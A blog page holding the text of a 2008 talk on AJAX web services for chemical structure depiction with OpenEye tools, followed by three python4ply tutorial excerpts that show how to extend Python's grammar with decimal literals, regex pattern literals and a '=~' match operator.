Dalke Scientific Software: More science. Less time. Products

Diary RSS | All of Andrew's writings | Diary archive

Writings from the software side of bioinformatics and chemical informatics, with a heaping of Python thrown in for good measure. Code to taste. Best served at room temperature.

EuroCUP 2008 presentation #

The following is text to accompany my presentation for EuroCUP 2008. I do not have a license for OEChem on my public facing web server machine so I cannot have a live demo for any of the code examples.

Download the presentation as PDF.

AJAX and the OpenEye Tools

My name is Andrew Dalke. I'm an independent software consultant and instrutor based in Göteborg (Gothenburg), Sweden. I mostly focus on developing computational chemistry tools and helping scientists become more capable in using computers to do their research.

[page 2]

Suppose you want a web page that shows a graphical 2D depiction of a compound given its SMILES. One very traditional way to do this - the Daylight libraries have supported it for over 10 years - is with a CGI script serving images based on the GET query parameters. The HTML might look like

<html>
...
<img src="/depict.cgi?smiles=CC(=O)Oc1ccccc1C(=O)O" />
...
</html>

The web page gets the HTML, figure out it needs an image, and makes an HTTP request to the src URL. The web server, which is usually Apache, gets the request, converts it into a CGI request, and runs the program named "depict.cgi". This program uses the CGI parameter to create the requested depiction. In real life the CGI script may in turn call another program to do the actual depiction.

[page 3]

This interface was developed about 15 years ago and is still a valid way to write web applications. There are many other ways to handle the interface between the outside world and the actual work which needs to be done. The modern term for the different layers, which can include database access, session maintenance, and output templates, are now called the "web application stack." Ruby on Rails is a popular "full stack" system developed over the last 4, and Django and TurboGears are roughly similar systems for Python. All my examples are based on TurboGears.

[page 4]

The web server implementation should not affect how the web interface works. That it, there should be no reason to change any of the URLs or get different HTML back from the server. In practice though you a few things do change. For example, using the extension ".cgi" in the URL is a bit of a cheat. It's there because that's one way Apache can tell if a file is a data file or an executable CGI script. In use it's a "leaky abstraction" because it lets some of the internal implementation decisions leak into the public. This can make it harder to port to other system.

In my case I'm using TurboGears, which by default doesn't do well with periods in the URL, so for my examples I'll remove the ".cgi" from the URL.

The TurboGears code is structured very similarly to the Apache code. An HTTP request comes in, TurboGears converts that into a Python function call (instead of CGI request), and calls the function that handles the request. In this case that Python function doesn't know anything about chemistry. It leaves the details up to OpenEye's ogham toolkit for 2D structure depiction.

The biggest architecture different is that everything is done through Python and Python libraries, and everything occurs in the same process space. I don't have to start up a new program for every request.

By the way, if you're curious on how I get ogham to generate a PNG output as a string, rather than as a GIF or other non-PNG file, see my earlier essay on "OE8BitImage to PNG." It was a fun bit of reverse engineering.

[page 5]

My web page example had a single hard-coded SMILES. What if I want something more interactive, where the user can input a SMILES and see the depiction image? I'll do this with an HTML form, which sends the "smiles" parameter to the "/depict" service on the web browser. This is the same service I used for the HTML image.

[page 6]

Viewing just the image is very static. The image just sits there. I would rather see the structure I submitted and also have a form for submitting a new SMILES to depict. In this case I'll submit the form to a new "/show_depict" handler, which will respond with HTML that includes an img element for requested SMILES and includes the form for doing a new "/show_depict" depiction. Note that this requires two requests to the server; the first to "/show_depict" for the HTML and and the second to "/depict" to get the depiction image.

[page 7]

By using HTML forms I've now advanced to HTML 2.0, which was formally specified in 1995. At the end of that year, Netscape Navigator introduced Javascript, which people originally used for doing form input validation. People make mistakes, and while hopefully the server is doing a layer of sanity checking, it still may take some time for the sent form to go the server and come back again. A Javascript program can make things feel more interactive by sitting inside of the web page where it can access HTML and form elements and handle events like ""form submitted."

The only difference in the HTML is the img src URL, so instead of submitting the form each time to the server, I'm going to listen for the "submit" event using Javascript. When that occurs I'll reach into the document (the formal term is the "document object mode", or "DOM") and change the URL, then tell the browser that there's no need to do the actual submission.

[page 8]

Here's how the HTML form looks like. I've added an "onsubmit" handler to the form, which is a bit of Javascript to call on form submission, and I've given identifiers to the SMILES input text box and to the depiction image, to make them easier to find later on.

[pages 9 and 10]

Here's the HTML fully fleshed out. The "onsubmit" handler calls the Javascript function "update_image()". This gets the text from the "smiles" field and finds the "description" image element. It then sets the description's "src" field to a URL based on the SMILES. I use the "escape" function because the user input may contain characters that have special meaning in URLs, like "/". The "return false" tells the browser that it does not need to send the form to the server.

This is out-dated!

[page 11]

I could go into more details but I won't, because what you see here is out-dated. This was state of the art about 6-8 years ago, but in practice there are problem with it. For example, it's hard to make components with it, like the ability to have multiple depictors in the same page. It mixes HTML and Javascript in the same file, which is harder to develop with and it confuses text editors. There's also the unfortunate problem that browsers have bugs. IE is known for its memory leaks in the face of circular references. There are workarounds, but learning them all takes time.

Thankfully there are better ways to develop Javascript tools. Most of the best practices and workarounds are available through Javascript libraries like jQuery, YUI, and MochiKit.

[page 12]

Here's the same form rewritten for use with jQuery. You see at the time I include the jQuery code, which is available as a single file from this URL. I then have a script block that sets up the interactive page. What this is saying is:

  When the document is fully loaded (that is, all the HTML has been parsed),
    Find the elements with tag name "form" (there is only one)
      When its submit button is pressed ...
        call this anonymous function.  ("anonymous" means "does not have a name")

Javascript allows "$" in a variable name. jQuery defines a special function named just "$" combines a selection language and a wrapper object. "$(document)" means "select the document object from Javascript and wrap it inside of a jQuery context." That context is what lets you do ".ready()" and ".submit()". If the function call gets a string then jQuery uses a sort of XPath language to select fields from the DOM. '$("form")' means "select all HTML elements named "form" while '$("#smiles")' means "select all HTML elements where the 'id' is 'smiles'.

The anonymous submit function does the following:

Select the "#smiles" element (that's the element with id 'smiles').
Get it's "val" property, which in this case is the input text for that field.
Escape it to make a depiction URL.
Assign the URL to the "src" attribute of the "#depiction" element (the element
   with id 'depiction')
Finally, "return false" to tell the browser it does not need to send the form.

This code is bit longer than the preceeding Javascript example, but that's only going to be the case for very simple examples like this. Otherwise the jQuery code is usually shorter, more succinct, and easier to understand, once you understand how jQuery works. It also separates the Javascript code completely from the HTML.

[pages 13 and 14]

I can make the interface still more interactive. The OpenEye depiction code is quite fast. Instead of waiting for the form submission I could update the image src URL after every keystroke. Sadly, this turns out to be complicated to do correctly. Javascript supports "keydown", "keyup", and "keypress" events, which sound like the right things. The problem is, the text isn't updated until after the event succeeds. Why? Because it's used for key input filtering. The Javascript handler can "return false" to tell the browser to ignore a given key.

It's also complicated because things like "control-v" for "paste", and "home" for "go to start of the input", and the backspace key are also handled as key input, but aren't simple changes to the text field. The easiest solution I found was to wait until after the event happens, let the browser do whatever is appropriate to the key input, and only then examine the contents of the text field.

I'm going to use MochiKit for this, which is another Javascript library. MochiKit is great for Python programmers like me because it makes Javascript feel more like Python. It adds mostly core-level libraries to simplify event handling, iteration, and DOM manipulation. There is some functionality overlap to jQuery, but they do work pretty well together. The only thing to watch out for is by default both want to define the '$' function.

Don't be put off by seeing that MochiKit's last release was in 2006. It's a stable, well-developed and mature library.

I import the MochiKit functionality with the usual <script> tag. Once the document is loaded and ready, I add a "keydown" handler on the "#smiles" element. This anonymous function will be called after every key press. But all the function does is ask the browser to call another function, "update_image", 0 seconds later. The browser adds it to the wait queue of function calls be done at some time in the future. These calls are only done when no event handler is being processed. (The Javascript code in a page is single-threaded by design.) The result is that "update_image" will be called most likely as soon as the keydown event is processed.

The "update_image" function should be very familiar. It's the code that extracts the text value from the "#smiles" element, constructs the image URL, and assigns it to the "#depiction" element's "src" field.

One of the many nice things about the OpenEye toolkit is it will handle partial SMILES strings as input. OEParseSmiles parses as much as it can understand and return True on success. If it returns False then the SMILES was not correct or was incomplete, but the molecule object will contain as much of the molecule as it was able to parse. It's a valid molecule object, and the depiction code has no problems laying it out.

JSON request

[page 15]

The example I depicts the molecule while typing in the SMILES string. I'm going to change it a bit and also display the IUPAC name for the SMILES string using OpenEye's naming code on the server. Again, this will be a highly interactive server where I can see the name while I am typing it.

This is a bit more complex than the image example because I need data from the server. I want to know if the SMILES string is a valid SMILES string (it could be an incomplete input) and the IUPAC name for the molecule, or at least as much of the input as OEParseSmiles could understand.

I'll do this by creating a new web service called "smi2name." It's a normal GET request that takes a "smiles" as its only input parameter and return a "JSON" document. JSON is a special data format in "JavaScript Object Notation", which is very fast for web browsers to handle as they already have code for dealing with Javascript code. This is a common technique in modern Javascript code and most libraries, including MochiKit, have code to make it easy to do.

At the bottom you can see an example JSON document that would be returned by this service. It's a Javascript dictionary containing a "status" field, which is either "valid" or "invalid", and a "name" field, containing the OpenEye's IUPAC name assignment.

[page 16]

My one change to the HTML is to include a "Name: " field below the image, which is where the IUPAC name will go. That's a label and an empty text span element, with the id "compound_name."

[page 17]

Here's the modified Javascript code for that case. You'll recognize the first half of the code. The "loadJSONDoc" is the MochiKit call to simplify making a JSON request. I give it the URL to call and an optional dictionary of query arguments. Requests like this are asynchronous, meaning that the Javascript has asked the browser to fetch the URL but it's not going to get the result right away.

Instead, MochiKit returns what's called a "Deferred" object. I can configure it to call "show_compound_name" once the JSON document has been fetched and parsed into a normal Javascript data structure.

The callback function is named "show_compound_name". The JSON document contains a Javascript dictionary, so I can get figure out if the input SMILES was valid or not and color the result black if it was valid or red if it was invalid.

The last line of real code shows jQuery's function call chaining. The '$("#compound_name")' selects the element with id "compound_name", which is the text span. The ".text(smi2name_result.name)" gets the "name" from the results dictionary and assigns it to the text content of the spam element. This is what displays the name to the user.

The result of calling ".text(...)" is the same query object. I can use it to change other properties of my selection. So I'll change the CSS "color" property and so it shows the red or black status value.

[page 18]

In case you're curious, here's most of the code on the server to implement "smi2name" using TurboGears. I left out only the scaffolding code that TurboGears writes for you and the lines to import the right OpenEye libraries into the Python module.

Demo

[page 19]

Last summer I spent a month learning how to use modern Javascript tools. My experimental test case was a 2D structure viewer widget. I developed a demo for it, and recorded an screencast.

[page 20]

The hardest part to get working was the mouseover support for the depiction. I ended up making extensive use of CSS, which tells the web page how to lay out a page. I used 4 layers on top of each other to get things working. The bottom layer is the Ogham depiction, and is the PNG image you've seen elsewhere. This is generated on the web server but only needs to change if the SMILES or the image size changes.

On top of that, the third layer is a semi-transparent image showing which atoms have been selected, either from mouse selection or from the SMARTS/atom index selection. This must occur on the server because that's what understands SMARTS, and must be recreated if the size or SMILES changes.

The top two layers are for mouseover support. The top layer is a transparent image containing only an image map. Each hotspot on the map is a circle, centered on the center of an atom. I use this to tell if the mouse is over an atom. If the image size changes then I make a JSON request to the server to get the new atom locations and scaled atom radius.

The second layer contains a small PNG with a circle and a transparent background. There's a bit of Javascript which connects the "mouseover"/"mouseout" events from the first layer to move the circle around in the second layer. The result is a fast, client-side highlighting of the atom the mouse is over.

The four layers are aligned so to the user it looks like one coherent view, despite the implementation complexity.



python4ply tutorial, part 3 #

The following is an except from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

Creating regular expression pattern objects

Regular expressions are fun. The first contact I had with them was through DOS globbing, where "*.*" matched all files with an extension. Then I started using Unix, and started using Archie, which supported regular expressions. Hmm, that was in 1990. I read the documentation for regexps but I didn't understand them. Instead I mentally translated the glob "?" to "." and the glob "*" to ".*".

Luckily for me I was in college and I took a theory of automata course. I loved that course. It taught me a lot about how to think about computers as what they are - glorified state machines.

Other programmers also really like regular expressions, and languages like Perl, Ruby, and Javascript consider them so important that are given syntax level support. Python is not one of those languages, and someone coming from Ruby, where you can do

# lines.rb
File.open("python_yacc.py").each do |line|
  if line =~ /def (\w+)/
    puts "#{$1}\n"
  end  
end
will probably find the corresponding Python both tedious and (because of the separation between the pattern definition and use) harder to read:
# lines.py
import re

pattern = re.compile(r"def (\w+)")

for line in open("python_yacc.py"):
    m = pattern.match(line)
    if m is not None:
        print m.group(1)
This code is generally considered the best practice for Python. It could be made a bit shorter by using re.match instead of the precompiled pattern, but at the cost of some performance.

I'll give Perl5 regular expressions (as implemented by the 're' module) first-class syntax support for creating patterns. That will shorten the code by getting rid of the "import re" and the "re.compile()" call. Here's how I want the pattern creation to look like

pattern = m/def (\w+)/
This new syntax is vaguely modelled after Perl's. It must start with a "m/" and end with a "/" on the same line. Note that my new syntax might break existing code because
m=12
a=3
i=2
print m/a/i
is already valid.

The new token definition goes before the t_NAME definition, to prevent the NAME from matching first. This token returns a 2-ple of the regular expression pattern as a string, and the flags to pass to re.compile. I need to pass it back as basic types and not a pattern object because the bytecode generation only understands the basic Python types.

import re
_re_flags = {
    "i": re.IGNORECASE,
    "l": re.LOCALE,
    "m": re.MULTILINE,
    "s": re.DOTALL,
    #"x": re.VERBOSE, # not useful in this context
    "u": re.UNICODE,
}
def t_PATTERN(t):
    r"m/[^/]*/[a-z]*"
    m, pattern, opts = t.value.split("/")
    
    flags = 0
    for c in opts:
        flag = _re_flags.get(c, None)
        if flag is None:
            # I could pin this down to the specific character position
            raise_syntax_error(
                "unsupported pattern modifier %r" % (c,), t)
        flags |= flag
    # test compile to make sure that it's a valid pattern
    try:
        re.compile(pattern, flags)
    except re.error, err:
        # Sadly, re.error doesn't include the error position
        raise_syntax_error(err.message, t)
    t.value = (pattern, flags)
    return t


# This goes after the strings otherwise r"" is seen as the NAME("r")
def t_NAME(t):
    r"[a-zA-Z_][a-zA-Z0-9_]*"
    t.type = RESERVED.get(t.value, "NAME")
    return t

This PATTERN will be a new "atom" at the grammar level, which will correspond to a call to re.compile("pattern", options).

def p_atom_13(p):
    'atom : PATTERN'
    pattern, flags = p[1]
    p[0] = ast.CallFunc(ast.Name("_$re_compile"), [ast.Const(pattern),
                                                   ast.Const(flags)])
    locate(p[0], p.lineno(1))

See how I'm using the impossible variable name '_$re_compile'? That's going to be "re.compile" and I'll use the same trick I did with the DECIMAL support and insert the AST corresponding to

from re import compile as _$compile
at the start of the module definition,
def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    stmt.nodes.insert(0, ast.From("re", [("compile", "_$re_compile")], 0))
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))

I'll test this with a simple program

# pattern_test.py
data = "name: Andrew Dalke   country:  Kingdom of Sweden "
pattern = m/Name: *(\w.*?) *Country: *(\w.*?) *$/i
m = pattern.match(data)
if m:
    print repr(m.group(1)), "lives in", repr(m.group(2))
else:
    print "unknown"
% python compile.py -e pattern_test.py 
'Andrew Dalke' lives in 'Kingdom of Sweden'
%
and to see that it generates byte code
% python compile.py  pattern_test.py
Compiling 'pattern_test.py'
% rm pattern_test.py
% python -c 'import pattern_test'
'Andrew Dalke' lives in 'Kingdom of Sweden'
%

Adding a match operator

These changes make it easier to define a pattern, but not to use it. As another example of (fake?) Perl envy. I'm going to support its "=~" match syntax so that the following is valid:

# count_atoms.py
import time

# Count the number of atoms in a PDB file
# Lines to match looks like:
# ATOM   6312  CB  ALA 3 235      24.681  54.463 137.827  1.00 51.30
# HETATM 6333  CA  MYR 4   1       6.722  54.417  88.584  1.00 50.79
count = 0
t1 = time.time()
for line in open("nucleosome.pdb"):
  if line =~ m/(ATOM  |HETATM)/:
      count += 1
print count, "atoms in", time.time()-t1, "seconds"

This turned out to be very simple. I need a new token for "=~". Most of the simple tokens are defined in "python_tokens.py". I added "EQUALMATCH" in the list of tokens in the place shown here

 ...
PERCENTEQUAL %=
AMPEREQUAL &=
CIRCUMFLEXEQUAL ^=
EQUALMATCH =~

COLON :
COMMA ,
 ...

Note that this will break legal existing code, like

>>> a=~2
>>> a
-3
>>> 
The lexer doesn't need anything else because I've already defined a PATTERN token.

I need to decide the precedence level of =~. Is it as strong as "**" or as weak as "or", or some place in between? I decided to make it as weak as "or", which is defined by the "test" definition. Here's my new "p_test_4" function:

def p_test_4(p):
    'test : or_test EQUALMATCH PATTERN'
    # pattern.search(or_test)
    sym = gensym("_$re-")
    pattern, flags = p[3]
    p.parser.patterns.append((sym, pattern, flags))
    p[0] = ast.Compare(
        ast.CallFunc(ast.Getattr(ast.Name(sym), 'search'), [p[1]], None, None),
        [("is not", ast.Name("None"))])
    locate(p[0], p.lineno(2))

I got the AST definition by looking at

>>> from compiler import parse
>>> parse("pat.search(line) is not None")
Module(None, Stmt([Discard(Compare(CallFunc(Getattr(Name('pat'), 'search'),
[Name('line')], None, None), [('is not', Name('None'))]))]))
>>> 

And that's it! Well, I could add an optimization in this case and move the ".search" outside the loop, but that's an exercise left for the student.

Now I'll put a toe into evil, just to see how cold it is. I'm going to add support for

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (\w+)/:
        print repr($1)
That is, if the =~ matches then $1, $2, ... will match group 1, 2. Oh, and while I'm at it, if there's a named group then $name will retrieve it. And '$' will mean to get the match object itself.

To make it work I need some way to do assignment in the expression. Python doesn't really support that except through a hack I don't want to use, so I'll use another hack and change the bytecode generation stage.

I created a new AST node called "AssignExpr" which is like an "Assign" node except that it can be used in an expression. The compiler module doesn't know about it and it's hard to change the code through subclassing, so I patch the compiler and its bytecode generation code so it understands the new node type. These changes are in "compiler_patches.py" and the patches are done when the module is imported. Take a look at the module if you want to see what it does.

It doesn't escape my notice that with AssignExpr there's only a handful of lines needed for support assignment in an expression, like

if line = readline():
    print repr(line)
Before you do that yourself, read the Python FAQ for why Python doesn't support this.

To support the new pattern match syntax I need to make two changes to python_yacc.py. The first is to import the monkeypatch module:

import compiler_patches
then make the changes to the p_test_4 function to save the match object to the variable "$".
def p_test_4(p):
    'test : or_test EQUALMATCH PATTERN'
    # pattern.search(or_test)
    sym = gensym("_$re-")
    pattern, flags = p[3]
    p.parser.patterns.append((sym, pattern, flags))
    p[0] = ast.Compare(
        ast.AssignExpr([ast.AssName("$", "OP_ASSIGN")],
                       ast.CallFunc(ast.Getattr(ast.Name(sym), 'search'),
                                    [p[1]], None, None)),
        [("is not", ast.Name("None"))])
    locate(p[0], p.lineno(2))

Does it work? Try this program, which is based on the Ruby code I started with at the start of this tutorial section, oh so long ago.

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (\w+)/:
        # I don't yet have syntax support to get to the special '$'
        # variable so I have to get it from the globals dictionary.
        print repr(globals()["$"].group(1))
% python compile.py -e get_function_names.py
'gensym'
'raise_syntax_error'
'locate'
'bounds'
'text_bounds'
'extract_docstring'
'__init__'
'__init__'
'add_arg'
'add_star_arg'
'p_file_input_1'
'p_file_input_2'
'p_file_input_star_1'
'p_file_input_star_2'
'p_file_input_star_3'
    ...

Sweet!

With a bit more work (described in detail in the tutorial), I changed the parser to allow this Perl/Python fusion syntax.

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (?P<name>\w+) *(?P<args>\(.*\)) *:/:
        print repr($1), repr($args)



python4ply tutorial, part 2 #

The following is an except from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

Syntax support for decimal numbers

How about something more complicated? Python's "decimal" module is a fixed point numeric type using base 10, which is especially useful for those dealing with money. Here's an obvious limitation of doing base 10 calculations in base 2. I stole it from the decimal documentation.

>>> 1.0 % 0.1
0.09999999999999995
>>> import decimal
>>> d = decimal.Decimal("1.0")
>>> d
Decimal("1.0")
>>> d / decimal.Decimal("0.1")
Decimal("10")
>>> 
The normal way to create a decimal number is to "import decimal" then use "decimal.Decimal". I'm going to add grammar-level support so that "0d12.3" is the same as decimal.Decimal("12.3"). There's a few complications so I'll walk you through how to do this.

I need a new DECIMAL token type that matches "0[dD][0-9]+(\.[0-9]+)?". This allows "0d1.23" and "0D1" and "0d0.89" but not "0d.2" nor "0d6." Feel free to change that if you want. Bear in mind possible ambiguities; does "0d1.x" mean the valid "Decimal('1').x" or the syntax error "Decimal('1.') x". What about "0d1..sqrt()"?

Designing a new programming language really means having to pay attention to nuances like this.

The DECIMAL rule is simple, in part because limitations of what can be saved the byte code means the creation of the decimal object must be deferred until later. Just like with the t_BIN_NUMBER rule, this new t_DECIMAL rule must go before t_OCT_NUMBER so there's no confusion.

def t_DECIMAL(t):
    r"0[dD][0-9]+(\.[0-9]+)?"
    t.value = t.value[2:]
    return t

def t_OCT_NUMBER(t):
    r"0[0-7]*[lL]?"
    t.type = "NUMBER"

If you save this and try it out on the following program

# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
you'll see
% python compile.py -e div.py
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
  File "compile.py", line 43, in execfile
    tree = python_yacc.parse(text, source_filename)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2607, in parse
    parse_tree = parser.parse(source, lexer=lexer)
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/yacc.py", line 237, in parse
    lookahead = get_token()     # Get the next token
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 657, in token
    x = self.token_stream.next()
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 609, in add_endmarker
    for tok in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 534, in synthesize_indentation_tokens
    for token in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 493, in annotate_indentation_state
    for token in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 435, in create_strings
    for tok in token_stream:
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/lex.py", line 305, in token
    func.__name__, newtok.type),lexdata[lexpos:])
ply.lex.LexError: /Users/dalke/src/python4ply-1.0/python_lex.py:203: Rule 't_DECIMAL' returned an unknown token type 'DECIMAL'
The list of known token type names is given in the 'token' variable, defined at the top of python_lex.py. I'll add "DECIMAL" to the list
tokens = tuple(python_tokens.tokens) + (
    "NEWLINE",

    "NUMBER",
    "NAME",
    "WS",
    "DECIMAL",

    "STRING_START_TRIPLE",
    "STRING_START_SINGLE",
     ....

With that change I get a new error message. Whoopie for me!

% python compile.py -e div.py
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
  File "compile.py", line 43, in execfile
    tree = python_yacc.parse(text, source_filename)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2607, in parse
    parse_tree = parser.parse(source, lexer=lexer)
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/yacc.py", line 346, in parse
    tok = self.errorfunc(errtoken)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2488, in p_error
    python_lex.raise_syntax_error("invalid syntax", t)
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 27, in raise_syntax_error
    _raise_error(message, t, SyntaxError)
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 24, in _raise_error
    raise klass(message, (filename, lineno, offset+1, text))
  File "div.py", line 3
    print "decimal", 0d1.0 % 0d0.1
                     ^
SyntaxError: invalid syntax
That's because the parser doesn't know what to do with a DECIMAL. What do you think it should it do? The ast.Const node only takes a string or a built-in numeric value. It doesn't take general Python objects because those can't be marshalled into bytecode.

I'll wait a moment for you to think about it.

Thought enough? No? Okay, just a moment more.

This new token should correspond to making a new Decimal object at that point. You might think you could be more clever than that and create the decimals during module imports, like I will do for the regular expression definitions coming later on in this tutorial. That would make the object creation occur only once, instead of once for each function call or for every time through a loop. But a decimal object depends on a global/thread-local context, and if I move the decimal creation then I might create it in the wrong context.

To make my life easier, I'm going to import the Decimal class as the super seekret module variable "_$Decimal". This is a variable name that can't occur in normal Python (because of the "$") and which is hidden from "... import *" statements (because of the leading "_"). That way the object creation is mostly a matter of calling "_$Decimal(s)" in the right place, which I can only do by constructing the AST myself.

What will that look like? I'll use the compiler package to show what that AST should look like:

>>> import compiler
>>> compiler.parse("from decimal import Decimal as D")
Module(None, Stmt([From('decimal', [('Decimal', 'D')], 0)]))
>>> compiler.parse("Decimal('12.345')")
Module(None, Stmt([Discard(CallFunc(Name('Decimal'),
[Const('12.345')], None, None))]))
>>>

The new DECIMAL token can go anywhere a NUMBER and NAME can go. That's an "atom" in the Python grammar.

atom: ('(' [yield_expr|testlist_gexp] ')' |
       '[' [listmaker] ']' |
       '{' [dictmaker] '}' |
       '`' testlist1 '`' |
       NAME | NUMBER | STRING+)
The last three of these are defined in python_yacc.py as:
def p_atom_9(p):
    'atom : NAME'
    p[0] = ast.Name(p[1])
    locate(p[0], p.lineno(1))#, text_bounds(p, 1))

def p_atom_10(p):
    'atom : NUMBER'
    value, orig_text = p[1]
    p[0] = ast.Const(value)
    locate(p[0], p.lineno(1))#, (p.lexpos(1), p.lexpos(1) + len(orig_text)))

def p_atom_11(p):
    'atom : atom_plus'
    # get the STRING (atom_plus does the string concatenation)
    s, lineno, span = p[1]
    p[0] = ast.Const(s)
    locate(p[0], lineno)#, span)
They are simple because the AST nodes are designed for Python. Nearly every token type and statement type maps directly to an AST node. The "locate" function assigns a line number to each created node, and you can see some of my experimental work also assign a start and end byte location.

Here's the new definition for DECIMAL, which is a bit more complex because I need to call _$Decimal. Remember that I can't simply use an ast.Const containing a decimal.Decimal because the byte code generation only supports strings and numbers.

def p_atom_12(p):
    "atom : DECIMAL"
    decimal_string = p[1]
    p[0] = ast.CallFunc(ast.Name("_$Decimal"),
                        [ast.Const(decimal_string)], None, None)
    locate(p[0], p.lineno(1))

At this point running the code should fail because _$Decimal doesn't exist.

% python compile.py -e div.py
yacc: Warning. Token 'WS' defined, but not used.
yacc: Warning. Token 'STRING_START_SINGLE' defined, but not used.
yacc: Warning. Token 'STRING_START_TRIPLE' defined, but not used.
yacc: Warning. Token 'STRING_CONTINUE' defined, but not used.
yacc: Warning. Token 'STRING_END' defined, but not used.
/Users/dalke/src/python4ply-1.0/python_yacc.py:2473: Warning. Rule 'encoding_decl' defined, but not used.
yacc: Warning. There are 5 unused tokens.
yacc: Warning. There is 1 unused rule.
yacc: Symbol 'encoding_decl' is unreachable.
yacc: Generating LALR parsing table...
float 0.1
decimal
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
  File "compile.py", line 48, in execfile
    exec code in mod.__dict__
  File "div.py", line 3, in <module>
    print "decimal", 0d1.0 % 0d0.1
NameError: name '_$Decimal' is not defined

Why are the 'yacc:' messages there? PLY uses a cached parsing table for better performance. When it notices a change in the grammar it invalidates the cache and rebuilds the table based on the new grammar. What you're seeing here are the messages from the rebuild.

Why is the exception there? Because the function call uses _$Decimal but that name doesn't exist. Why does it report line 3 even through I only assigned a line number to the ast.CallFunc and not the ast.Name, which is what acutally failed? Because the AST generation code in the compiler module doesn't always assign line numbers so the byte code generation step assumes it's the same as the line number for the previously generated instruction.

For extra credit, why does the following report the error on line 3 instead of line 1?

def p_atom_12(p):
    "atom : DECIMAL"
    decimal_string = p[1]
    p[0] = ast.CallFunc(ast.Name("_$Decimal"),
                        [ast.Const(decimal_string)], None, None)
    locate(p[0], 1)  # Why doesn't this report the error on line 1?

The last bit of magic is to import the Decimal constructor correctly. The root term in the Python grammar is "file_input". (There's another root if you're doing an 'eval'.) One case is for an empty file and the other is for a file that contains statements. The code as distributed looks like this:

def p_file_input_1(p):
    "file_input : ENDMARKER"
    # Empty file
    stmt = ast.Stmt([])
    locate(stmt, 1)#, (None, None))
    p[0] = ast.Module(None, stmt)
    locate(p[0], 1)#, (None, None))

def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))
By definition the empty file can't have any Decimal statements in it so I'll only worry about p_file_input_2. But I won't worry much. For instance, for now I won't worry that the file can contain __future__ statements. These must go before any statement other than the doc string. (If you really want to worry about that then feel free to worry. And also worry that in older Pythons "as" and "with" were not reserved words.)

I'll insert the new import statement as the first statement in the created module.

def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    stmt.nodes.insert(0, ast.From("decimal", [("Decimal", "_$Decimal")], 0))
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))
That's it.

That was it?

Yes, that was it. Want to see it work?

% cat div.py
# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
% python compile.py -e div.py
float 0.1
decimal 0.0
% 



python4ply tutorial, part 1 #

The following is an except from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

What is it python4ply?

python4ply is a Python parser for the Python language. The grammar definition uses PLY, a parser system for Python modelled on yacc/lex. The parser rules use the "compiler" module from the standard library to build a Python AST and to generate byte code for .pyc file.

You might use python4ply to experiment with variations in the Python language. The PLY-based lexer and parser are much easier to change than the C implementation Python itself uses or even the ones written in Python which are part of the standard library. This tutorial walks through examples of how to make changes in different levels of the system.

If you only want access to Python's normal AST, which includes line numbers and byte position for the code fragements, you should use the _ast module.

Reminiscing, fabrications, and warnings

Back long time ago I had a class assignment to develop a GUI interface using drawpoint and drawtext primitives only. Everything - buttons, text displays, even the mouse pointer itself - was built on those primitives. It gave the strange feeling of knowing that GUIs are completely and utterly fake. There's no there there, and it's only through a lot of effort that it feels real. Those that aren't as old and grizzled as I am might get the same feeling with modern web GUIs. Those fancy sliders and cool UI effects are built on divs and spans and CSS and a lot of hard work. They aren't really there.

This package gives you the same feeling about Python. It contains a Python grammar definition for the PLY parser. The file python_lex.py is the tokenizer, along with some code to synthesize the INDENT, DEDENT and ENDMARKER tags. The file python_yacc.py is the parser. The result is an AST compatible with that from the compiler module, which you can use to generate Python byte code (".pyc" files).

There's also a python_grammer.py file which makes a nearly useless concrete syntax tree. This parser was created by grammar_to_ply.py, which converts the Python "Grammar" definition into a form that PLY can more easily understand. I keep it around to make sure that the rules in python_yacc.py stay correct. You might also find it useful if you want to port the grammar directly to yacc or some similar parser system.

What this means is this package gives you, if you put work into it, the ability to create a Python variant that works on the Python VM, or if you put a lot of work into it (like the Jython, PyPy, and IronPython developers), a first step into making your own Python implementation.

